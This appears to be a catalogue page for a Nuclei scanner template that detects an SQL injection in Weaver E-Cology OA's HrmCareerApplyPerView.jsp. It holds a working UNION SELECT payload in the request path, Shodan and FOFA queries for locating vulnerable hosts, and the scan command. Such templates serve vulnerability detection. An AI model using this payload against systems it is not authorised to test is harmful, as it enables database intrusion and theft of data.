Weaver E-Cology HrmCareerApplyPerView - SQL Injection
ID: weaver-ecology-hrmcareer-sqli
Severity: high
Author: SleepingBag945
Tags: ecology,weaver,oa,sqli
Description
Section titled “Description”There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability.
YAML Source
Section titled “YAML Source”id: weaver-ecology-hrmcareer-sqli
info: name: Weaver E-Cology HrmCareerApplyPerView - SQL Injection author: SleepingBag945 severity: high description: | There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability. reference: - https://github.com/ibaiw/2023Hvv/blob/556de69ffc370fd9827e2cf5027373543e2513d4/%E6%B3%9B%E5%BE%AE%20HrmCareerApplyPerView%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1#L3 classification: cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" product: e-cology vendor: weaver tags: ecology,weaver,oa,sqli
variables: num: "999999999"
http: - method: GET path: - "{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),4,5,6,7"
matchers-condition: and matchers: - type: word part: body words: - '{{md5(num)}}'
- type: status status: - 200# digest: 490a0046304402207f5ce6815edb69c4cd8ffb836bd0c88da5b083753fdc1883ec48a1f159c22cfb022060a737acfb2fa7d0959cc6ea1ea8395d4e751f427a941d775f98d25434569cda:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml"